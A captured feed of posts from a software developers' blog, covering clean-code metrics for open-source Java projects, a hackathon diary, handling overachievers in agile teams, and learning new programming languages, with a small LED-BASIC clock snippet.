So what do you think? What would you tell him? What’re your favorite reads about Startups and how to create a product your customers love? Let me know in the comments below, write me a message, link this post in your own blog. I’m very eager to hear other and additive opinions.

Keep up the challenge!

Yours

Sören

]]>
Clean Code: The hard facts and figures https://craftcoders.app/clean-code-the-hard-facts-and-figures/ Mon, 14 Jan 2019 20:53:41 +0000 https://craftcoders.app/?p=891 Read More]]> A couple of weeks ago I began to read Uncle Bob’s old developer bible: Clean Code. I was excited about the presented concepts and put a lot of thought into applying them into code. One day I was lying on the couch of our office, reading Chapter 2: Meaningful Names. Meanwhile, I overheard our team discussing the best troll name for a new database. Another day, I was reading the next chapter. Chapter 3: Functions should be small and do one thing only. Back at my desk, I found myself scrolling through functions with hundreds of lines of code.

Although most teams I know try to produce clean code, it seems to be a hard thing to keep a project clean while it grows. I began to wonder: How much clean code is really out there in the wild? Followed by: How can a project even be considered as clean? So I picked some famous open source projects and analyzed them!

What makes a project clean?

First, let’s summarize what I did: My first intent was to check a static code analysis tool like SonarQube, but I could hardly find an open-source project which also published the results of such tooling. This is when Metrilyzer was born. An analysis tool of mine (private projects again^^) which can read almost every Java-based project to do some data analysis on it. At first, I focused on the following metrics:

  • Classes per package
  • Lines per class
  • Methods per class
  • Lines per method
  • Parameter per method

Of course, they are not enough to consider a project as “cleanly coded” but in my opinion they give a good indication on code modularity and compliance with single responsibility principle. This is one of the hardest things to accomplish from my point of view. So using these metrics you can at least see clearly when a project is not clean coded. 😉 Here are the results.

Cassandra, ElasticSearch, Spring Boot – The hard figures

The four tested projects are Cassandra 3.11, ElasticSearch 6.5, Spring Boot 2.1 and Neuronizer Notes (an Android app of mine). In the boxplots you can see the number of lines per class (y-axis) per project (x-axis). N is the number of classes in the project (which could be analyzed by Metrilyzer). The maximum values are somehow obscured so that the rest of the plot looks better, but you can still read them in the table. If you don’t know how boxplots work look here: What a Boxplot Can Tell You about a Statistical Data Set

You can see that most of the classes are very small and more than 75% of all classes are smaller than 100 lines of code. Despite every project having a couple of huge classes. It seems like the bigger the project, the longer the longest class is. Not very surprising, but things get more interesting when you compare different metrics. Let’s take a look at lines per method for example:

Like the classes, most of the methods are very small and more than 75% are smaller than 15 lines per method. Despite a large number of methods Spring Boot does a very good job at keeping them small. With a maximum of 54 lines per method. Also interesting is the correlation between N in the two metrics (which is the average number of methods per class):

  • Cassandra: 19393 methods in 4162 classes = 4,65 methods per class
  • Elastic Search: 36027 methods in 8021 classes = 4,51 methods per class
  • Spring Boot: 14140 methods in 5963 classes = 2,37 methods per class
  • Neuronizer Notes: 571 methods in 173 classes = 3,30 methods per class

I have to mention that getter and setter methods are excluded so in reality, the numbers are slightly higher (see metrics at the end). Neuronizer which is a small application has an easy time at keeping classes and methods small. As you can see Cassandra and Elastic Search do have a harder time. But Spring Boot is doing very well in comparison to the others. They have even smaller methods than my little android app. Okay, now let’s take a look at the most problematic classes.

Pinning down problems

What you can see here are the five most biggest classes for each project.

  Lines per class
Cassandra org.apache.cassandra.service.StorageService:     4300
org.apache.cassandra.cql3.validation.operations.SelectTest:     2427
org.apache.cassandra.service.StorageProxy:     2244
org.apache.cassandra.db.LegacyLayout:     2160
org.apache.cassandra.db.ColumnFamilyStore:     2136
Elastic Search org.elasticsearch.index.engine.InternalEngineTests:     4653
org.elasticsearch.index.translog.TranslogTests:     2804
org.elasticsearch.index.shard.IndexShardTests:     2652
org.elasticsearch.index.engine.InternalEngine:     2631
org.elasticsearch.index.shard.IndexShard:     2566
Spring Boot org.springframework.boot.context.properties.ConfigurationPropertiesTests:     1509
org.springframework.boot.test.json.JsonContentAssert:     1277
org.springframework.boot.SpringApplicationTests:     1269
org.springframework.boot.SpringApplication:     1267
org.springframework.boot.test.web.client.TestRestTemplate:     1234
Neuronizer de.djuelg.neuronizer.presentation.ui.fragments.TodoListFragment:     458
de.djuelg.neuronizer.presentation.ui.fragments.PreviewFragment:     285
de.djuelg.neuronizer.presentation.ui.fragments.ItemFragment:     251
de.djuelg.neuronizer.storage.TodoListRepositoryImpl:     248
de.djuelg.neuronizer.storage.TodoListRepositoryImplTest:     214

What I recognized at first were the test classes. Since the teams out there (at least those I have been part of) care less about test code quality vs. productive code quality it makes sense they can get very long. You can also see that long classes lead to long test classes. Elastics InternalEngine and InternalEngineTests for example. As test classes grow it gets harder and harder to keep them maintainable, so a well thought-out model for test classes should be applied. Regarding large test classes, I can recommend the article Writing Clean Tests – Small Is Beautiful.

Another important thing you can learn from this table is where the application has not been modeled carefully. Cassandras StorageService, for example, has a very generic name and became the biggest god class in the project. Elastics Engine and InternalEngine had a similar destiny. These classes could easily be separated in a couple of subclasses, but as they are now they just cannot be clean.

For the interested guys out there, here are the other metrics in an uncommented form. They will be mentioned in the Conclusion though. All visualizations have been done using goodcalculators.com.

Conclusion

Probably, you already thought in the beginning: You can’t put hard figures on the rules of Clean Code like “Oh boy, this class here is 5 lines too long! Are you dumb?” But you can use these metrics as an orientation. You can aim for the Pareto principle. For example: Refactor the highest 20% of each metric. Try to be in the lower 80% with all your new code. When you reach 100 lines of code in a class, for example, there could be better ways to modularize that piece of code. Here are the 80% boundaries for each metric (based on all analyzed projects):

  • 80% of all classes are smaller than 100 lines
  • 80% of all methods are smaller than 12 lines
  • 80% of all packages have less than 25 classes
  • 80% of all classes have less than 8 methods
  • 80% of all methods have less than 3 parameter

Despite this being a rather shallow analysis on the topic of clean code, the results were quite interesting. Using Metrilyzer on a single project with tailored visualizations can be even more helpful to improve modularity and to locate trouble spots. Maybe you want to give it a try to analyze your own projects. If so, I would be glad to hear from you 🙂

Greets, Domi

]]>
The Stuttgart Hackathon Diary https://craftcoders.app/the-stuttgart-hackathon-diary/ Tue, 30 Oct 2018 21:32:52 +0000 https://craftcoders.app/?p=854 Read More]]> Day one on the Stuttgart Hackathon. Our team arrived in three parts:
– The hardcore ones who even took some vacation to get there in time.
– The cool ones who arrived later
– and there is Leon…
In this blog post, I am going to give you an impression of the hackathon.

Day 1

Dear diary, it’s the first day on the Hackathon. Dominik, Danny and I chose to work on the cloud of clouds projects. Sören is also with us, but he works on another project with some friends. The idea behind cloud of clouds is, that you are no longer limited to online storage. Instead, your data is distributed across all cloud provider. So no single cloud provider owns your data! In two days we can not develop a complete client with a CRUD implementation. As a result, we decided to develop a library and a simple CLI that allows uploading a file.

Brainstorming

Night 1

Actually, there’s not much to tell. Because we decided to sleep for a few hours the first night 🙂

Our sleeping place

Day 2

Dear diary,
Dominik, Danny and I decided to do some kind of pair programming. We are just using Danny’s Mac Book for coding – no other pc is used! Funny… cause everyone is looking at us because the three of us cuddled up in the sleeping-corner to program in TDD style. Jop, you understand correctly we are doing test-driven development on a Hackathon! Actually, no one of us has done that before, so it’s awesome that we are working together on one pc. You might think “WTF TDD on a Hackathon?!” and you are right… It’s uncommon to write tests on a Hackathon, but we think it may be a great experience and we can learn a lot from it! In the end, a Hackathon is not about winning, it’s about learning!

Day 2 done – still motivated 🙂

Night 2

We are getting closer and closer to full implementation. Developing in TDD style has changed our interfaces, which we created at the beginning. Those were magic moments! I’ve never developed TDD before, but it’s impressive to see how the test determines the shape of the code.
But we still haven’t connected Dropbox or Google Drive. However, the time is running out! It’s time to unpack our secret weapon, the Crack-Hoe-Pattern. You’re probably wondering what this is ? It’s a design pattern for software that we’ve been using for some hackathons. Using the Crack-Hoe pattern you can achieve maximum encapsulation of ugly code. You put everything into a class called Crack-Hoe. Using a single access point, the magic method, the ugly code can then be executed.

But despite our secret weapon, the crack-hoe pattern, we had to sleep in shifts to get through the implementation.

Day 3

Phew… we made it. Shortly before 9 am we implemented our use case to upload a file, as well as a CLI client. The pitches take place in two rounds. In the first round, you have 5min time to convince the jury. The 20 best ones are allowed to pitch on stage for 3 minutes. But there are several hours between round one and round two. So time to catch up on some sleep!

They are gonna hate me for publishing that photo ?

The 20 best teams will be presented… and… and… and… Oh no! We are not among the 20 best 🙁 But hey, you can’t win every hackathon! Also, it has something good not to have to pitch again, you can drink a beer with a good conscience. So, we all sat together for a beer and listened to the pitches of the other teams 🙂

Both Teams

BTW Leon never arrived. But we still love him very much 🙂

]]>
5 Steps for Working with an Overachiever in Agile Teams https://craftcoders.app/5-steps-to-handle-overachiever-in-agile-teams/ Mon, 22 Oct 2018 15:27:37 +0000 https://craftcoders.app/?p=817 Read More]]> There is this one developer in your team. She knows the code best. Everyone knows her and everyone asks for her opinion, even if not team or code-related. She is in the same agile team as you, also for quite some time now and she saved the day more than once. In team discussions, she sometimes won’t let you finish your sentence, but comes up with a better idea anyway. She sometimes even talks for your sake and you like it, because she does it well, and… it is so convenient to lean back a bit. She has the highest userstory-count, and most of the difficult or risky tasks get handled playfully by her. You sometimes wonder how she does it, but well… she is just good in what she does, right? Wrong!

She is a strong personality, an overachiever, a hero, a secret leader – even if not all of the above apply to your teammate, she still can be one. In this blog post, I will try to make you understand, why those (hereafter called) overachievers carry a huge risk for an agile team (and company) inside. It is easy to ignore, tolerate or just accept, but if you and no one does anything about a team-substance like this, it can react poisonous when combined with wrong elements. Dare to let it be as is, and you will suffer the consequences, just like the rest of your team. The way of least resistance is not always a good choice.

But what is so bad about it?

Depending on the overachiever and the team, the following things are possible to happen to some extent:

  • Skill development, success, and outcome should be team achievements. If only one person gets all the credit or is the go-to-person for everything, the rest of the team starts feeling discouraged. Why try harder, when you can only do your job, hide behind her and work off the 9to5-duties? Falling into this behavior, makes your work ultimately seem meaningless. Friendly colleagues, a more or less appropriate salary or a nice environment will not motivate on a long run. If you lose the mission, why stand up in the early Monday mornings at all?
  • You wonder how she does it? She might never let you know. Overachievers tend to take over the tasks, with the mentality of “If you don’t do it yourself, it won’t be done (properly)”. Like this, she thinks (or says): “By the time she explains it to you or someone else, she has it done by herself”. The latest, when you hear one of those two phrases, your alarm should go off! She eagerly maintains her knowledge island and makes it grow. So the team success depends on her, sometimes only on her. This puts the team and the organization into a bad place when she feels like she wants “more”, is on vacation, simply not there, or even leaves. In Agile Teams, this is worst case in action! Because…
  • It is easy and seems intuitive to mismanage: teams and even companies die in the long run due to encouraging overachiever to save the day over and over again. This is what I saw going down at Goodgame Studios back in the days: They get the feeling that they must be held within the team, or it will fail. Bad/ inexperienced managers tend to think they need to give everything to keep them in the company. Suddenly, that overachiever finds herself as people-manager, not able to perform like in her original profession. As a result, the company traded a highly professional developer (or whatsoever) for a “bad”-leader. That’s a lose-lose-resolution. For a manager, it is easy to overlook the short-sightedness of the success of such an overachiever. Therefore, it is important that everyone understands: A mismanagement of such overachievers is a threat to sustainable success.
  • Overachiever have their specific characteristics. Your teams’ approaches and results will lose it’s exploratory diversity when she is always “in the lead”. Remember: the Product Owner brings the “why”, the Scrum Master the “how” and the team the “what” (see https://www.boost.co.nz/blog/2018/04/successful-scrum-team-product-owner).  By having the same approaches and doing the same type of work, you will lose the important ability of scrum teams: solving unknown and complex problems. Work starts to feel highly repetitive and – again – meaningless. The rest of the team starts mirroring her, by also over-/underthinking stories or spending too much/not enough time on general discussions. Moreover, the personal development of each team member will suffer, when no one breaks this pattern.
  • Team member feel like they cannot contribute, so they start letting the overachiever make all the talk-work. This ultimately leads to letting her also do all the thought-work (because it’s convenient)… And even though it’s an overachiever in the lead, she might not be aware of the specifics of her “power” and influence. The team ends up with getting poorly directed. “People [working for an overachiever often] do not understand where they are going. They’re just following the walk of this turbocharged leader, who doesn’t direct the team but focuses on output. They get annoyed, exhausted, and feel that they need to second-guess what the leader wants because they’re not being told.”, Goleman, D. “Leadership That Gets Results,” Harvard Business Review, March-April 2000.

What to do?

The main objectives are:

  • Let the overachiever share his knowledge (to reduce knowledge island risk),
  • Give every person equal opportunities to provide their input (to live collaboration and achieve diverse approaches to master complex problems).

Be sure: The overachiever in your team is not a bad person! She aims for only the best for the company and product. Of course, to her, it seems that she does it very well! Remember, you are not enemies or opponents, but teammates who need to figure out how to work best together and achieve sustainable success (and fun)!

Step 1 – Out of your comfort zone!

Well… not (only) the overachiever is the reason why change needs to happen. What does Michael Jackson say again? Start with the man in the mirror! “If you wanna make the world a better place, take a look at yourself and then make a change!”

Speak up, take action, demand change, to improve communication and vary methodologies, and don’t fall into the dangerous pit of self-pity and couchpotato-convenience. See this paragraph as a start for your journey, for letting your team grow together, a bunch of equals. The team needs someone like you. You will be the one who must be demanding change, if your Scrum Master, Product Owner or Lead doesn’t do it! It means, if not you, no one will. The fact that you feel/ realize that this might be or become an issue in your team, you are the chosen one.

But how, you ask? Expect and demand baby steps! There will not be a “big bang”-change and everything is “good”: One step after another. Even small changes can have a big impact.

Step 2 – The (Scrum Master) Talk

I know, the Scrum Master is not holding any leadership position and yet, she is the one who should facilitate and host team gatherings and meetings. She is supposed to take care that exactly this does not happen. Her influence is limited by the willingness of the team, so give her reason and solid ground to work on equalization within the team. Maybe she is not very experienced yet, or she also just accepted things how they are (aware or unaware of what it means). You should find the talk with her about what she thinks about the situation, and what you can do to lift up the team spirit and sustainability! There are many things she can do, to give everyone the change to commit their ideas, opinions, and qualities.

Ah… and by the way: Even if it is only you, who feels a bit outside of the system (and everyone else is kind-of ok), you still should make your point to her. A Scrum Master should also be the go-to-person, for a team members issues, and help to get all the potential on the street!

Step 3 – Remind and demand Agile Principles

Do I really have to say this? Agile teamwork is about dialogues and collaboration. Embrace every individual in your team as equally important and qualified, as a potential if not experienced (yet). Collaborate, interact, and get the best out of every single member! See the first freaking line of the goddamn Agile Manifesto: “Individuals and interactions over processes and tools” ( http://agilemanifesto.org/ ). Such simple and undiluted wisdom… It makes me cry every time I have to remind people to think about it. It should be burned in your and everyone’s (developer) brain. It is not negotiable or relocatable. This should be surer than day follows night. Before you try to enable the potential of your team with methods or tricks, consider talking about the issue openly with the whole team. Make them understand why embracing and supporting overachiever-ness means to risks sustainable success. A retrospective meeting is a very proper time to place your concerns! Agile teamwork is based on trust. Give your team (including the overachiever) the benefit of trust and honesty.

Step 4 – Bring in opportunities for good behavior

Train your instinct and get a sense for the right moments to embrace collaboration. In discussions and talks, notice who is silent and doesn’t commit to active collaboration. Encourage them to speak (up), i.e. by actively asking them about their opinion. If you know your team members well, another more sneaky way is, to bring up a topic they are passionate about, make a connection and/or take an opposition-position, so you tease them out of their lethargy (you can also (later) be honest about your evil-genuine plan to get them into the conversation). Continuously place suggestions to collaborate or to do pair programming, because sometimes a little push in the right direction is all that’s needed. Yes, also you as a teammate can do this – no need for a Teamlead, Scrum Master or Product Owner to make those moves.

Step 5 – Remove opportunities for bad behavior

There are several methodologies to give everyone the opportunity to provide their own input and to also let them talk without being interrupted, discouraged, or subdued. Usually, your Scrum Master comes up with those ideas, yet sometimes they also need a little inspiration. Don’t worry. It doesn’t always need to be a big thing. Actually, mostly it can already be enough to request a democratic vote, to let everyone think about something themselves and/ or add their thoughts. But for some bigger topics, you might think of the following two approaches: A neat little allrounder method is the silent brainstorming, with a followed presentation-time. Everyone has around 5 to 10 minutes to make up their mind and write it on sticky notes. Afterward, when everyone is ready and done, each participant gets a limited time to present the sticky notes, and do something with them, according to whatever purpose the brainstorming was about. Like this, everything is limited to a specific timeframe and as you can see everyone provides in the same manner. You will find your team in situations where brainstorming can be of value. Instead of just throwing in ideas (and get overwhelmed by the overachiever), you can suggest silent brainstorming. Something that helped me a lot to manage bigger teams, with a multi-dimensional problem, was the following: Split the team into two- or three-people-groups. Each group targets one part of the topic and presents it to the rest of the team members. If you want more people to provide input to each aspect do the following: Instead of only dividing the team into smaller groups, you also divide the room/ location into different subject-islands. Each island has one subject-host (preferably the overachiever is also a subject-host). Every person/ group spends around 5 to 15 minutes on each island, while the host notes the important parts of the talks/ discussions. After every group talked about every subject, the hosts present the results of the island. This was most helpful at retrospective meetings or to get solutions for highly complex features or goals.

Always remember: You are not enemies, but teammates!

I hope I could give you a little sense of how you can handle the overachiever in your team. Of course, there is no such thing as a clear path to teamwork-city, but if you take my words as a starting point for orientation, you maybe find the right way. Don’t hesitate to comment or write a direct mail to me, when you have any further questions or feedback.

Enjoy, collaborate and succeed!

Soeren

]]>
3 Lessons about Education https://craftcoders.app/3-lessons-about-education/ Mon, 15 Oct 2018 19:24:04 +0000 https://craftcoders.app/?p=811 Read More]]> I was going to write a plain old blog post with a lot of letters following one another, you know, the usual way, when suddenly ** wild inspiration appeared **. And I thought, why do you guys always have to do all the reading. So I made a video for you. It is 6 minutes long and it took me 3 days to create, so please be kind.

P.S.: Yes, I did misspell “playfulness” in the video. Let’s just all move on and pretend it didn’t happen.

Let’s learn from each other. In a fun way.
Dannynator.

]]>
Explore the Unexplored! (Tech world) https://craftcoders.app/explore-the-unexplored-tech-world/ Mon, 08 Oct 2018 15:58:16 +0000 https://craftcoders.app/?p=774 Read More]]> Autumn is coming. This is the time when I like to grab a cup of hot tea and crawl under a warm blanket with my laptop. As a developer, it’s a good time to broaden your horizons with new knowledge. I want to motivate you to use that time as well to explore the tech world.

Whilst working on tech stuff, often a talk with a friend comes to my mind. When he asked in a deeply sarcastic tone whether I’ve got time to meet up or if I’m into my “private projects” again. Yeah, exploring the tech world can be pretty time consuming but doing so is great fun too. The result of that time was an Android note app which I use until today regularly. With that project, I learned a lot about clean architecture, object-orientation, Android, UX, and even project management.

How to approach it

Basically, the message is: Engage with a tech field you are new to. This is not a new idea. Despite, a lot of professional and experienced developers have a limited mindset when it comes to usage of appropriate technologies because they don’t know the objective advantages and disadvantages of choosing one technology over another.

So, the question is not whether you should broaden your horizons or not. It is when and how you should do it and how to keep on. Here are two approaches which both have their own up- and downsides:

  • Private Projects: You can work on your own small projects about a topic you personally find interesting. As it is something you chose yourself chances are that you are super motivated to start the task. The problem is that you might choose the project scope too big and lose interest before finishing the project. Another problem might be that you don’t have an idea what to code. Therefore I prepared the second point.
  • 7 Languages in 7 Weeks: This is a book written by an inspiring author called Bruce Tate. Within his book, you can find seven introductions to programming languages (what a surprise). They all have different emphasis just like different private projects. If you are a more structured kind of person this might be the choice for you because Mr. Tate guides you through advantages and disadvantages of technologies systematically.

Hacking to the Gate

My current project is part of our future gadget lab, so put your cup of hot tea aside and take a fresh cool Dr.Pepper instead!  We gave our project the name Divergence Meter (modernized) Ver.2.31 and it will help us to finally leave the alpha attractor field and reach the Steins;Gate worldline. I can’t tell you too much as the organization is chasing after us. ~el psy kongroo

For the boring normies out there: A divergence meter is a fictional device from the anime Steins;Gate, but you can use it as a multifunctional clock. A friend of mine built the thing and I’m currently programming it. We created a modernized version using lixies instead of the original nixie tubes because for our poor lab they were more affordable. The lixies work with a rotary encoder called Cronios-1. Put simply, with the rotary encoder you can program your device using a dialect of BASIC namely LED-BASIC. Here is an impression of the beautiful code you can write with it:


' VAR: g: Month from data, q: Day from data
8020:
for i = 1 to 10 step 3
g = read 50, i
q = read 50, (i+1)
if g = (IO.getrtc(4)) and q >= (IO.getrtc(3)) and i <> (IO.eeread(18)) then IO.eewrite(18, i)
next i
return

I never programmed that close to the actual hardware and it feels quite hacky in the beginning. You can spend hours trying to display a 6-digit number. The code for our clock has a length of more than 1800 lines in a single file with jump marks all over the place.

Benefits

But I could learn a lot about imperative programming especially when it comes to separation of concerns. With such a long file and a maximum of 26 variables which are all global ones, you have to think about where to put what code snippet to avoid side effects and maintain the structure. Generally speaking, by engaging with projects like this one or the previously mentioned Android app you can think of problems in new ways and use your knowledge from one technology in another. This is also what Mr. Tate states as you will see in the next section.

7 Languages in 7 Weeks

Let’s assume that you’ve actually managed the difficult task of downloading and installing the interpreter or compiler for the language you are interested in. What should you do next? What will be your first program? – Joe Armstrong, creator of Erlang

This is an excerpt of the  books preface. If you also have these questions in mind whenever you think about starting a project, then the book will be just right for you. It is stated that new programming models emerge roughly every 20 years. Some emerging new languages are covered and some well-known languages, too. By doing so you can see how different paradigms can overlap or make clean breaks. Concurrency, for example, is a topic which is treated very differently in different languages.

Covered languages

Here is quick overview of the languages and some of the aspects you can learn from them:

  • Ruby: Object orientation, dynamic typing
  • Io: Prototype programming, dynamic typing, concurrent programming
  • Prolog: constraint-logic programming, declarative
  • Scala: Functional programming, Object orientation, addresses critic about Java
  • Erlang: Functional programming, concurrent programming, immutability
  • Clojure: Functional programming, treat code as data, lisp near
  • Haskell: Functional programming, strong static typing, lazy evaluation

How to proceed

As soon as you have worked through the book and you are still eager to learn you can search the web for code katas or object calisthenics. These little exercises will help you build more confidence in programming especially if you choose unfamiliar technologies.

As always thanks for reading! One rumors that you can find a pdf version of the book if you search the web. Maybe you should take the chance and start right away using it 😉

Greets,
Hououin Kyouma

]]>